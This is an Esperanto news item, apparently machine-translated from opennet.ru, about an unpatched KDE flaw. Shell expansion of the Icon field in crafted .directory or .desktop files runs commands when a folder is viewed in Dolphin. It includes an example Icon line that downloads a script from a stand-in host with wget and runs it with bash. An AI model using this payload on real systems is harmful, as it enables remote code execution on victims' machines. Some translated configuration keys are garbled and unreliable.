En KDE , kiu permesas al atakanto efektivigi arbitrajn komandojn kiam uzanto rigardas dosierujon aŭ arkivon enhavantan speciale dizajnitajn ".desktop" kaj ".directory" dosierojn. Atako postulas, ke la uzanto simple rigardu liston de dosieroj en la dosiermanaĝero de Dolphin, elŝutu malican labortablan dosieron aŭ trenu ŝparvojon sur la labortablo aŭ en dokumenton. La problemo manifestiĝas en la nuna eldono de bibliotekoj kaj pli malnovaj versioj, ĝis KDE 4. La vundebleco daŭre estas (CVE ne asignita).
La problemo estas kaŭzita de malĝusta efektivigo de la klaso KDesktopFile, kiu, kiam oni prilaboras la variablon "Ikono", sen taŭga eskapo, transdonas la valoron al la funkcio KConfigPrivate::expandString(), kiu realigas vastiĝon de ŝelaj specialaj signoj, inkluzive de prilaborado. la ĉenoj “$(..)” kiel ordonoj plenumendaj . Kontraŭe al la postuloj de la XDG-specifo, efektivigo ŝelkonstruaĵoj estas produktitaj sen apartigado de la speco de agordoj, t.e. ne nur kiam oni determinas la komandlinion de la lanĉota aplikaĵo, sed ankaŭ kiam oni specifas la ikonojn montritajn defaŭlte.
Ekzemple, ataki sendu al la uzanto zip-arkivon kun dosierujo enhavanta dosieron ".directory" kiel:
[Tabla Eniro]
Tipo=Adresaro
Ikono[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Kiam vi provas vidi la enhavon de la arkivo en la dosieradministranto de Dolphin, la skripto https://example.com/FILENAME.sh estos elŝutita kaj ekzekutita.
fonto: opennet.ru